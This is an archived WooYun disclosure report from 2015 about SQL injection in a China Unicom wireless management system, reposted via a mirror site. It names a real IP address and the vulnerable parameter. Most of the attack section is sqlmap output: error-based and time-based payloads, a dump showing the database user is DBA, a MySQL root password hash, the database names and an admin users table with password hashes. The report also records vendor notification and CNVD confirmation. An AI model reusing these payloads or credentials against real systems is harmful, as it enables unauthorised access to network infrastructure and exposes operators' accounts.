乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-26: 细节已通知厂商并且等待厂商处理中 2015-01-30: 厂商已经确认,细节仅向厂商公开 2015-02-09: 细节向核心白帽子及相关领域专家公开 2015-02-19: 细节向普通白帽子公开 2015-03-01: 细节向实习白帽子公开 2015-03-12: 细节向公众公开
中国联通某无线管理系统sql注射漏洞,导致可登陆后台以控制沧州农业大学,泊头师范,任丘上海大酒店,任丘政府招待处,任丘乐家酒店,任丘联通办公楼联通AP。
1#
http://221.195.55.178
此系统为zabbix监控系统,版本存在sql注射漏洞导致可登陆后台以控制AP。注射点:
http://221.195.55.178/httpmon.php?applications=2
sqlmap identified the following injection points with a total of 286 HTTP(s) requests:---Parameter: applications (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: applications=2 AND (SELECT 9322 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT (CASE WHEN (9322=9322) THEN 1 ELSE 0 END)),0x716b6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: applications=2 AND SLEEP(5)---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.1.6back-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: applications (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: applications=2 AND (SELECT 9322 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT (CASE WHEN (9322=9322) THEN 1 ELSE 0 END)),0x716b6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: applications=2 AND SLEEP(5)---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.1.6back-end DBMS: MySQL 5.0current user is DBA: Truedatabase management system users password hashes:[*] root [2]: password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 password hash: NULLavailable databases [6]:[*] bnmsdb[*] information_schema[*] logdb[*] mysql[*] reportdb[*] test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: applications (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: applications=2 AND (SELECT 9322 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT (CASE WHEN (9322=9322) THEN 1 ELSE 0 END)),0x716b6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: applications=2 AND SLEEP(5)---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.1.6back-end DBMS: MySQL 5.0Database: bnmsdbTable: users[3 entries]+---------+----------------------------------+| name | passwd |+---------+----------------------------------+| admin | 6a8d294a3c408fa10f4627bbbc276221 || czlt | 8d08e029de80bd4e268edac90cd2cdbe || Default | d41d8cd98f00b204e9800998ecf8427e |+---------+----------------------------------+
2#登陆后台
<img src="
" />
升级系统
危害等级:高
漏洞Rank:13
确认时间:2015-01-30 09:46
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给河北分中心,由河北分中心后续协调网站管理单位处置。
暂无